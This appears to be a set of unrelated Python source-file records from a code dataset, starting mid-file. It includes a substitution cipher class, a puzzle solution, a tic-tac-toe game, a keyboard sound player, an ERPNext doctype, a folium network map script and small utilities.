(len(matches) == 0):\n matches = cypher_match(encrypted_word, words)\n \n match = matches[randint(0, len(matches) - 1)]\n map = {}\n for i in range(0, len(encrypted_word)):\n assert len(encrypted_word) == len(match), \"encrypted_word and match should be the same length.\"\n map[match[i]] = encrypted_word[i]\n \n to_return = Cypher(map)\n to_return.shuffle_unmapped();\n return to_return\n\n\n def encrypt(self, str):\n to_return = \"\"\n for s in str:\n if s in self._cyphermap:\n to_return = to_return + self._cyphermap[s]\n else:\n to_return = to_return + s\n\n return to_return\n\n def decrypt(self, str):\n to_return = \"\"\n for s in str:\n if s in self._decyphermap:\n to_return = to_return + self._decyphermap[s]\n else:\n to_return = to_return + s\n return to_return\n \n def shuffle_unmapped(self):\n\n remaining_keys = ALPHABET[:]\n \n remaining_values = ALPHABET[:]\n for key in self._cyphermap.keys():\n remaining_keys.replace(key, \"\")\n remaining_values.replace(self._cyphermap[key], \"\")\n \n keyidx = 0\n while len(remaining_values) > 0:\n index = randint(0, len(remaining_values) - 1)\n result = remaining_values[index]\n if index == len(remaining_values) - 1:\n remaining_values = remaining_values[:index]\n else:\n remaining_values = remaining_values[:index] + remaining_values[index + 1:]\n self._cyphermap[remaining_keys[keyidx]] = result\n self._decyphermap[result] = remaining_keys[keyidx]\n keyidx = keyidx + 1\n\n \n def shuffle_map(self):\n self._cyphermap = {}\n self._decyphermap = {}\n self.shuffle_unmapped()\n\n def swap(self, key1, key2):\n \n val1 = self._cyphermap[key1]\n val2 = self._cyphermap[key2]\n\n self._cyphermap[key1] = val2\n self._cyphermap[key2] = val1\n\n self._decyphermap[val2] = key1\n self._decyphermap[val1] = key2\n\n 
\n","sub_path":"cypher.py","file_name":"cypher.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"135543532","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 3 10:27:50 2018\n\n@author: James Jiang\n\"\"\"\n\nall_lines = [line.rstrip('\\n') for line in open('Data.txt')]\n\nvowels = [char for char in 'aeiou']\nillegals = ['ab', 'cd', 'pq', 'xy']\n\ndef is_nice(string):\n for illegal in illegals:\n if illegal in string:\n return False\n else:\n vowel_count = 0\n double_count = 0\n for i in range(len(string) - 1):\n if string[i] in vowels:\n vowel_count += 1\n if string[i] == string[i + 1]:\n double_count += 1\n if string[-1] in vowels:\n vowel_count += 1\n if vowel_count < 3:\n return False\n elif double_count == 0:\n return False\n else:\n return True\n\ncount = 0 \nfor string in all_lines:\n if is_nice(string) == True:\n count += 1\n \nprint(count)\n","sub_path":"python/2015day5part1.py","file_name":"2015day5part1.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"642127451","text":"# Tic tac toe Project\nimport random\nname = input(\"Enter your name: \")\ngame_input = ['Null','x','o','x','o','x','o','x','o','x']\ndef board(game_input):\n\tprint(game_input[7]+'|'+game_input[8]+'|'+game_input[9])\n\tprint(game_input[4]+'|'+game_input[5]+'|'+game_input[6])\n\tprint(game_input[1]+'|'+game_input[2]+'|'+game_input[3])\n\n#print(board(game_input))\n\ndef player_input():\n\tmarker = input(f\"Dear {name}! Choose your marker either 'x' or 'o':\")\n\twhile marker != 'x' and marker != 'o':\n\t\tmarker = input(\"Choose your marker again: \")\n\tif marker == 'x':\n\t\treturn ('x ','o ')\n\telse:\n\t\treturn('o ','x ')\n#Put the marker on board\ndef put_marker(game_input,marker,position):\n\tgame_input[position] = marker\n\n\n#Criteria to check if the player has won or not\ndef win(game_input,marker):\n\treturn ((game_input[7] == game_input[8] == game_input[9] == marker) or\n\t\t\t(game_input[4] == game_input[5] == game_input[6] == marker) or\n \t\t(game_input[7] == game_input[4] == game_input[1] == marker) or\n\t\t\t(game_input[8] == game_input[5] == game_input[2] == marker) or\n \t\t(game_input[9] == game_input[6] == game_input[3] == marker) or\n \t\t(game_input[1] == game_input[5] == game_input[9] == marker) or\n\t\t\t(game_input[7] == game_input[5] == game_input[3] == marker))\n \n#print(win(game_input,'o'))\n#choose player using random function\ndef choose_player():\n\tplayer = random.randint(1,2)\n\tif player == 1:\n\t\treturn 'Player_1'\n\telse:\n\t\treturn 'Player_2'\n#checking empty space\ndef space(game_input,position):\n\treturn game_input[position] == ' '\n#checking full board for empty space\ndef full_board_check(game_input):\n\tfor i in range(1,10):\n\t\tif space(game_input,i):\n\t\t\treturn False\n\t\treturn True\n#player Choice marker Placement\ndef player_choice(game_input):\n\tposition = 0\n\twhile position not in [1,2,3,4,5,6,7,8,9] or not space(game_input,position):\n\t\tposition = int(input(\"Please choose your position (1-9) on num-pad: \"))\n\treturn position\n#Would u like to play again\ndef play_again():\n\tchoice = input(\"Would you like to play again [y/x]\")\n\treturn choice == 'y'\n\n#Game mechanism\nwhile True:\n\tthe_board = [' ']*10\n\tplayer_1,player_2 = player_input()\n\tprint(player_1 + 'is player_1 sign')\n\tprint(player_2 + 'is player_2 sign')\n\tturn = choose_player()\n\tprint(turn + \"will play first\")\n\tplay_game = input(\"Are you ready to play[y/n]\")\n\tif play_game == 'y':\n\t\tgame_on = True\n\telse:\n\t\tgame_on = False\n\twhile game_on:\n\t\tif turn == 'player_1':\n\t\t\tboard(the_board)\n\t\t\tposition = player_choice(the_board)\n\t\t\tput_marker(the_board,player_1,position)\n\t\t\tif win(the_board,player_1):\n\t\t\t\tboard(the_board)\n\t\t\t\tprint(\"Player1 has won\")\n\t\t\t\tgame_on = False\n\t\t\telse:\n\t\t\t\tif full_board_check(the_board):\n\t\t\t\t\tboard(the_board)\n\t\t\t\t\tprint(\"Game tie\")\n\t\t\t\t\tgame_on = False\n\t\t\t\telse:\n\t\t\t\t\tturn = 'player_2'\n\t\telse:\n\t\t\tboard(the_board)\n\t\t\tposition = player_choice(the_board)\n\t\t\tput_marker(the_board,player_2,position)\n\t\t\tif win(the_board,player_2):\n\t\t\t\tboard(the_board)\n\t\t\t\tprint(\"Player2 has won\")\n\t\t\t\tgame_on = False\n\t\t\telse:\n\t\t\t\tif full_board_check(the_board):\n\t\t\t\t\tboard(the_board)\n\t\t\t\t\tprint(\"Game tie\")\n\t\t\t\t\tgame_on = False\n\t\t\t\telse:\n\t\t\t\t\tturn = 'player_1'\n\n# Check weatherr the player wants to paly again or not\n\tif not 
play_again():\n\t\tbreak\n","sub_path":"Project_One_Tic_Tac_Toe/Tic_tac_toe.py","file_name":"Tic_tac_toe.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"307606944","text":"import keyboard\r\nimport pygame\r\nimport os\r\nimport json\r\n\r\n\r\ndef get_sounds(s, k):\r\n s[k].play()\r\n\r\n\r\npygame.mixer.pre_init(44100, 16, 2, 4096)\r\npygame.mixer.init()\r\npygame.mixer.music.set_volume(0.5)\r\n\r\ndirectory_path = os.path.join(os.path.abspath('..'), 'sounds')\r\n\r\nsounds = {}\r\nkey_map = json.load(open(os.path.join(directory_path, 'sounds.json')))\r\nfor key, path in key_map.items():\r\n sounds[key] = pygame.mixer.Sound(os.path.join(directory_path, key_map[key]))\r\n keyboard.add_hotkey(key, get_sounds, (sounds, key, ))\r\n\r\nkeyboard.wait('esc')\r\n","sub_path":"src/keyboard_sound_json.py","file_name":"keyboard_sound_json.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"102066000","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2021, Jigar Tarpara and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom erpnext.hr.utils import update_employee\n\n\nclass EmployeeRejoin(Document):\n def on_submit(self):\n employee = frappe.get_doc(\"Employee\", self.employee)\n employee = update_employee(\n employee, self.employee_rejoin_detail, date=employee.date_of_joining)\n for row in employee.internal_work_history:\n row.to_date = employee.relieving_date\n employee.save()\n frappe.db.set_value(\"Employee\", self.employee,\n 'date_of_joining', self.rejoin_date)\n\n def on_cancel(self):\n employee = frappe.get_doc(\"Employee\", self.employee)\n employee = update_employee(\n employee, self.employee_rejoin_detail, cancel=True)\n employee.save()\n","sub_path":"pni_customization/pni_customization/doctype/employee_rejoin/employee_rejoin.py","file_name":"employee_rejoin.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"9240451","text":"import pandas as pd\nimport numpy as np\nimport folium\nimport json\nimport gmsxfr\nimport os\nimport argparse\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gams_sysdir\", dest=\"gams_sysdir\", default=None, type=str)\n parser.add_argument(\"--data_repo\", dest=\"data_repo\", default=None, type=str)\n parser.add_argument(\"--output\", dest=\"output\", default=None, type=str)\n parser.add_argument(\"--data_dir\", dest=\"data_dir\", default=None, type=str)\n\n # parser.set_defaults(gams_sysdir=\"some path here\")\n # parser.set_defaults(data_repo=\"some path here\")\n # parser.set_defaults(data_dir=\"some path here\")\n\n args = parser.parse_args()\n\n #\n #\n # get network data\n gdx = gmsxfr.GdxContainer(\n args.gams_sysdir, os.path.join(args.data_repo, \"processed_werewolf_data.gdx\")\n )\n gdx.rgdx([\"lat\", \"lng\", \"map_aggr\"])\n\n lat = gdx.to_dict(\"lat\")\n lng = gdx.to_dict(\"lng\")\n map_aggr = gdx.to_dataframe(\"map_aggr\")\n\n gdx = gmsxfr.GdxContainer(\n args.gams_sysdir, os.path.join(args.data_repo, \"network_arcs.gdx\")\n )\n gdx.rgdx(\"ij\")\n\n ij = gdx.to_dict(\"ij\")\n\n gdx = gmsxfr.GdxContainer(\n args.gams_sysdir, os.path.join(args.data_repo, \"final_results.gdx\")\n )\n gdx.rgdx([\"i\", \"map_center\"])\n\n model_regions = gdx.to_dict(\"i\")\n map_center = gdx.to_dict(\"map_center\")\n\n agg = gdx.to_dataframe(\"i\")[\"elements\"].copy().set_index(\"i\")\n agg[\"lat\"] = agg.index.map(lat[\"elements\"])\n agg[\"lng\"] = agg.index.map(lng[\"elements\"])\n\n agg_pts = dict(zip(agg.index, list(zip(agg.lat, agg.lng))))\n\n #\n #\n # map network with Delaunay triangulation\n with open(os.path.join(args.data_repo, \"regions.json\")) as f:\n geodata = json.load(f)\n\n map_center = [map_center[\"elements\"][\"lat\"], map_center[\"elements\"][\"lng\"]]\n\n my_map = folium.Map(location=map_center, zoom_start=6)\n\n borders = folium.FeatureGroup(\"Counties\", show=False)\n\n folium.GeoJson(\n os.path.join(args.data_dir, \"county_borders.json\"),\n name=\"Counties\",\n style_function=lambda x: {\"weight\": 0.25},\n ).add_to(borders)\n my_map.add_child(borders)\n\n borders = folium.FeatureGroup(\"Tribal Lands\", show=False)\n folium.GeoJson(\n os.path.join(args.data_dir, \"nrel-bia_tribal_lands.json\"),\n name=\"Tribal Lands\",\n style_function=lambda x: {\"weight\": 0.25},\n ).add_to(borders)\n my_map.add_child(borders)\n\n borders = folium.FeatureGroup(\"NREL ReEDS Regions\", show=False)\n folium.GeoJson(\n os.path.join(args.data_dir, \"nrel-lpreg3.json\"),\n name=\"NREL ReEDS Regions\",\n style_function=lambda x: {\"weight\": 0.25},\n ).add_to(borders)\n my_map.add_child(borders)\n\n borders = folium.FeatureGroup(\"Werewolf Regions\", show=False)\n folium.GeoJson(\n geodata, name=\"WEREWOLF Regions\", style_function=lambda x: {\"weight\": 0.25}\n ).add_to(borders)\n my_map.add_child(borders)\n\n arcs = folium.FeatureGroup(\n \"Synthetic Transmission Network\", control=True, show=False\n )\n for i, j in ij[\"elements\"]:\n line = folium.PolyLine(\n [\n (lat[\"elements\"][i], lng[\"elements\"][i]),\n (lat[\"elements\"][j], lng[\"elements\"][j]),\n ],\n weight=0.75,\n color=\"black\",\n )\n arcs.add_child(line)\n\n nodes = folium.FeatureGroup(\"Node Labels\", control=True, show=False)\n for i in model_regions[\"elements\"]:\n circ = folium.Circle(\n [lat[\"elements\"][i], lng[\"elements\"][i]],\n popup=i,\n radius=500,\n color=\"orange\",\n fill=True,\n fill_color=\"orange\",\n )\n 
nodes.add_child(circ)\n\n my_map.add_child(arcs)\n my_map.add_child(nodes)\n folium.LayerControl().add_to(my_map)\n my_map.save(os.path.join(args.output, \"transmission_network.html\"))\n","sub_path":"werewolf_python/map_model_network.py","file_name":"map_model_network.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"347195028","text":"#Find the missing numbers in a array of 10 elements\n#first in order\n\nelements=[1,2,3,5,6,7,8,9,10]\n\ndef findMissingOne(array):\n for i in range(len(array)-1):\n if (array[i]+1)!= array[i+1]:\n return array[i]+1\n return\n\n\n\nprint(findMissingOne(elements))","sub_path":"CodeWars/Fundamentals/MissingNumbers.py","file_name":"MissingNumbers.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"262495848","text":"import networkx as nx\nfrom networkx import graphviz_layout\nfrom matplotlib import pyplot as plt\n\n\ndef visualize(tree, custom_alpha=0.5, labels=False):\n G = nx.Graph(tree)\n pos = nx.graphviz_layout(G, prog='twopi', args='', root='root')\n plt.figure(figsize=(10, 10))\n nx.draw(G, pos, node_size=0, alpha=custom_alpha, node_color=\"blue\", with_labels=labels)\n plt.axis('equal')\n plt.show()\n","sub_path":"code/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}